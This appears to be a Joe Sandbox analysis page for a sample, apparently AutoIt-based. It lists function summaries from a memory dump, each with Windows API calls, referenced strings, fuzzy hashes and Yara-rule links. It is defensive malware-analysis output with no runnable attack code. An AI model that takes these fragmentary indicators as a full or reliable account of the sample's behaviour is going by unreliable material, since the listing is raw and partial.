Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 155a0ae7c0646861381600da6de16ce92eb0dec3c229fe3c4cfd9e4b17f4ae2e
Instruction ID: 0521b08f37dbe1162a4360bbb03b14948783d35255ade8badbc4385bb9183c7a
Opcode Fuzzy Hash: 155a0ae7c0646861381600da6de16ce92eb0dec3c229fe3c4cfd9e4b17f4ae2e
Instruction Fuzzy Hash: EF714871A00619EFCB14DF94C894AAEBBF4BF48314F04C499E85AAB392C774ED45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A5719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 00A57206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A5723C
GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 00A5724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A572CF

Strings

DllGetClassObject, xrefs: 00A57242

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 4ffe212610b07d4206682afb1e898b4164445acf9f3938eb164120eafb60a2a4
Instruction ID: 1ee2444927219ab776d8d910a96730dd122d26735850ef58388f50e91e6af225
Opcode Fuzzy Hash: 4ffe212610b07d4206682afb1e898b4164445acf9f3938eb164120eafb60a2a4
Instruction Fuzzy Hash: 20414E71A04204EFDB15CF94D884ADE7BB9FF44711F2480A9BD09AF20AD7B1D949CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A82F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A82F8D
LoadLibraryW.KERNEL32(?), ref: 00A82F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A82FA9
DestroyWindow.USER32 ref: 00A82FB1

Strings

SysAnimate32, xrefs: 00A82F68

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: afe4bf061f5c8d77beed6a8fae8b69c536a8d39f9a4c2b1e069df55d083ef303
Instruction ID: da115ebc78b0805cdd59f159d46f393cca4de3374ff351c6d321b5107ae494fe
Opcode Fuzzy Hash: afe4bf061f5c8d77beed6a8fae8b69c536a8d39f9a4c2b1e069df55d083ef303
Instruction Fuzzy Hash: 09216A71204209ABEB10AFA4DC84FBB77B9EF99364F104628FA50D6190D771DC61DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A14D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A14D1E,00A228E9,?,00A14CBE,00A228E9,00AB88B8,0000000C,00A14E15,00A228E9,00000002), ref: 00A14D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,00A14D1E,00A228E9,?,00A14CBE,00A228E9,00AB88B8,0000000C,00A14E15,00A228E9,00000002), ref: 00A14DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00A14D1E,00A228E9,?,00A14CBE,00A228E9,00AB88B8,0000000C,00A14E15,00A228E9,00000002,00000000), ref: 00A14DC3

Strings

CorExitProcess, xrefs: 00A14D98
mscoree.dll, xrefs: 00A14D86

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2134e7879c629775e2c565f62c322524a370ea04efef3b88c1eab6a3345ab0ea
Instruction ID: efba0ee5c67b6429d72ccdd6b0bc2bfee5d90db2007cc8fce4a3659ad902e53c
Opcode Fuzzy Hash: 2134e7879c629775e2c565f62c322524a370ea04efef3b88c1eab6a3345ab0ea
Instruction Fuzzy Hash: 98F03C35A40218BBDB119BD4EC49BEEBBE5EF48762F0001A8B905A2260CB745985DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00A4D3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A4D3BF
FreeLibrary.KERNEL32(00000000), ref: 00A4D3E5

Strings

GetSystemWow64DirectoryW, xrefs: 00A4D3B9
X64, xrefs: 00A4D2A8

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: b5d08b750864d389698e7d5bfa7b3f055efbdea4a0b5ae846f5b2ce754fa7e08
Instruction ID: 96ce96e58b4a7ef77a52ba866df6d971b1a448495eb3a45c07b10b3710d4643a
Opcode Fuzzy Hash: b5d08b750864d389698e7d5bfa7b3f055efbdea4a0b5ae846f5b2ce754fa7e08
Instruction Fuzzy Hash: 9AF0553A906620ABD7306B108C98AAD7324AF91F01B908288F802F9145DBB0CD418BA2

Uniqueness

Uniqueness Score: -1.00%

Function 009F4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 009F4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,009F4EDD,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4EAE
FreeLibrary.KERNEL32(00000000,?,?,009F4EDD,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 009F4EA8
kernel32.dll, xrefs: 009F4E94

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 93b511b02db688dc018ca2db7d35fe541910c2df4cd89a9c6af4d187734793de
Instruction ID: b046bf6cb63db8add0f9cf2408b31efd6d92754a7ab163bfa09f96baa989a104
Opcode Fuzzy Hash: 93b511b02db688dc018ca2db7d35fe541910c2df4cd89a9c6af4d187734793de
Instruction Fuzzy Hash: 5EE08C36A02A226BD3326B65BC5CB6B665CBF81F72B050215FE00E2201DB74CD068BB0

Uniqueness

Uniqueness Score: -1.00%

Function 009F4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 009F4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00A33CDE,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4E74
FreeLibrary.KERNEL32(00000000,?,?,00A33CDE,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 009F4E6E
kernel32.dll, xrefs: 009F4E5B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 1234bb9695936eb949bdee653b89e60436e403d57f72a96c5b75260dad16267d
Instruction ID: d5c969c19838074245211d0930faf3ee9a4c9a15d5e8cbb797e234db96b92b15
Opcode Fuzzy Hash: 1234bb9695936eb949bdee653b89e60436e403d57f72a96c5b75260dad16267d
Instruction Fuzzy Hash: 97D0C232502A2167CB322B247C0CE9B2A1CBF81F313050710BA01A2110CF34CD168BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00A7A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A7A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A7A468
CloseHandle.KERNEL32(?), ref: 00A7A63D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 8eecac44c3a00d0c17be3fc2a52dc0204b144c10826ebc9a722cae12876fc828
Instruction ID: 947374b65c78292622b1bbe079d9a8b1d4e62a5e7bffeed6b1bbaf4b5aeb5174
Opcode Fuzzy Hash: 8eecac44c3a00d0c17be3fc2a52dc0204b144c10826ebc9a722cae12876fc828
Instruction Fuzzy Hash: 57A1B071604301AFD720DF24D886F2AB7E5AF94714F14C81DFA9A9B2D2D7B1EC418B92

Uniqueness

Uniqueness Score: -1.00%

Function 00A2BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A93700), ref: 00A2BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00AC121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A2BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00AC1270,000000FF,?,0000003F,00000000,?), ref: 00A2BC36
_free.LIBCMT ref: 00A2BB7F

Part of subcall function 00A229C8: HeapFree.KERNEL32(00000000,00000000), ref: 00A229DE
Part of subcall function 00A229C8: GetLastError.KERNEL32(00000000,?,00A2D7D1,00000000,00000000,00000000,00000000,?,00A2D7F8,00000000,00000007,00000000,?,00A2DBF5,00000000,00000000), ref: 00A229F0

_free.LIBCMT ref: 00A2BD4B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: c28a0e7b294cf99d490e7fd903824182d07a14176eba61b04e6fca6d36669102
Instruction ID: ec16a0f3dbd74cee00ca4e7a208538fda56322aa71839c9f2721d763599a55c2
Opcode Fuzzy Hash: c28a0e7b294cf99d490e7fd903824182d07a14176eba61b04e6fca6d36669102
Instruction Fuzzy Hash: 0C51E975910229AFCB10EFADAD81DEEB7BCEF45320B11427AE554D71A2EB309D418B70

Uniqueness

Uniqueness Score: -1.00%

Function 00A5E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A5DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A5CF22,?), ref: 00A5DDFD

Part of subcall function 00A5DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A5CF22,?), ref: 00A5DE16

Part of subcall function 00A5E199: GetFileAttributesW.KERNEL32(?,00A5CF95), ref: 00A5E19A

lstrcmpiW.KERNEL32(?,?), ref: 00A5E473
MoveFileW.KERNEL32 ref: 00A5E4AC
_wcslen.LIBCMT ref: 00A5E5EB
_wcslen.LIBCMT ref: 00A5E603
SHFileOperationW.SHELL32 ref: 00A5E650

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 703fe2e888f60376a4cd4080ea8600a0d1cbce827d05a2b0293558d6bad35045
Instruction ID: e4c8ba3b791ff177f81033b70afa8a3b240cf105cdaf2ac8566610332942fd56
Opcode Fuzzy Hash: 703fe2e888f60376a4cd4080ea8600a0d1cbce827d05a2b0293558d6bad35045
Instruction Fuzzy Hash: 205174B24083455BC728EB90D881ADB73ECAF94351F00491EFA89D3151EF75A68CC766

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

Part of subcall function 00A7C998: CharUpperBuffW.USER32(?,?), ref: 00A7C9B5
Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7C9F1
Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7CA68
Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7BAA5
RegOpenKeyExW.ADVAPI32 ref: 00A7BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A7BB63
RegCloseKey.ADVAPI32(?), ref: 00A7BBA6
RegCloseKey.ADVAPI32(00000000), ref: 00A7BBB3

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 66dbca403357ec2512c3e8160623ddca72f8f67882f90df2d9df01d95cf3d5da
Instruction ID: 154b89d0526feeb5ad86234ee09d5dc078f651638c0ea1228239a11d07809819
Opcode Fuzzy Hash: 66dbca403357ec2512c3e8160623ddca72f8f67882f90df2d9df01d95cf3d5da
Instruction Fuzzy Hash: AC616871218205AFC314DF14C890F2ABBE5BF84348F14C96CF4998B2A2DB31ED45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A58BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A58BCD
VariantClear.OLEAUT32 ref: 00A58C3E
VariantClear.OLEAUT32 ref: 00A58C9D
VariantClear.OLEAUT32(?), ref: 00A58D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A58D3B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 6a1698217ad6a9f875e089f27e6bdb3d5f4762ac0cda1d75a2d18ac09d24dbab
Instruction ID: 1dc6aa99acaf09a4f0711a0d34238ee75200840f4fda139d34a5a5024234b728
Opcode Fuzzy Hash: 6a1698217ad6a9f875e089f27e6bdb3d5f4762ac0cda1d75a2d18ac09d24dbab
Instruction Fuzzy Hash: BA5159B5A00219EFCB14CF68C894AAAB7F9FF89311B158559ED05EB350E734E911CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A68AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32 ref: 00A68BAE
GetPrivateProfileSectionW.KERNEL32 ref: 00A68BDA
WritePrivateProfileSectionW.KERNEL32 ref: 00A68C32
WritePrivateProfileStringW.KERNEL32 ref: 00A68C57
WritePrivateProfileStringW.KERNEL32 ref: 00A68C5F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: c441810930a6e71ae67ba1a6bf6c3bca3a557491a17fc4e02bdbbb4bf011aa36
Instruction ID: 2d1acd3747875bb1f10103ca7737d992c2e7544cc9f3b0fb495b34996730746e
Opcode Fuzzy Hash: c441810930a6e71ae67ba1a6bf6c3bca3a557491a17fc4e02bdbbb4bf011aa36
Instruction Fuzzy Hash: A4513A35A002199FCB15DF64C881E6DBBF5FF48314F088458E949AB3A2DB39ED55CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A78EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00A78F40
GetProcAddress.KERNEL32(00000000,?,00000000,?), ref: 00A78FD0
GetProcAddress.KERNEL32(00000000,00000000,00000000,?), ref: 00A78FEC
GetProcAddress.KERNEL32(00000000,?,00000041), ref: 00A79032
FreeLibrary.KERNEL32(00000000), ref: 00A79052

Part of subcall function 00A0F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00A61043,?,759D3F18), ref: 00A0F6E6
Part of subcall function 00A0F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00A4FA64,00000000,00000000,?,?,00A61043,?,759D3F18,?,00A4FA64), ref: 00A0F70D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 1545b65b1eee395074825472ce13e439b9a02dd36fe9e33eb67bafa7970e0190
Instruction ID: ab7c1290f11c9cfa6ea02d3ac250192f3835dd9f8dba1f813d7598852c9a182c
Opcode Fuzzy Hash: 1545b65b1eee395074825472ce13e439b9a02dd36fe9e33eb67bafa7970e0190
Instruction Fuzzy Hash: DD513934600209DFCB11DF58C8949ADBBB1FF49324B04C0A9E90A9B762DB35ED86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A86B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 00A86C33
SetWindowLongW.USER32 ref: 00A86C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00A86C73
ShowWindow.USER32(00000002,00000000), ref: 00A86C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 00A86CC7

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: ecd7ff9d981aa437d25c4a43cc96efe924a7173f379ae388f4b4a4441e3ad4f7
Instruction ID: 94d21153a9f8ee39efa4c69f213b0ee0c785a9c4b2aec6b970bac3dc8b46fe9d
Opcode Fuzzy Hash: ecd7ff9d981aa437d25c4a43cc96efe924a7173f379ae388f4b4a4441e3ad4f7
Instruction Fuzzy Hash: 7941D3B5A04104AFEB24EF68CD58FB97BA5EB09360F150228F899A73E1D371ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A22051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A220C3
_free.LIBCMT ref: 00A220E3

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 801cbdfc2af3509944c05a93589132390caad3556e1b3c42647b208822d342b6
Instruction ID: c93b6ebeb4731fa32aac49de5806a82623f2a3cf50737892c4106bf3614780c7
Opcode Fuzzy Hash: 801cbdfc2af3509944c05a93589132390caad3556e1b3c42647b208822d342b6
Instruction Fuzzy Hash: 1341C132A00214AFCB24DF7CD981B5DB7B5EF89314B154678EA15EB3A2DB31AD01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00A0912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A09141
ScreenToClient.USER32(00000000,?), ref: 00A0915E
GetAsyncKeyState.USER32 ref: 00A09183
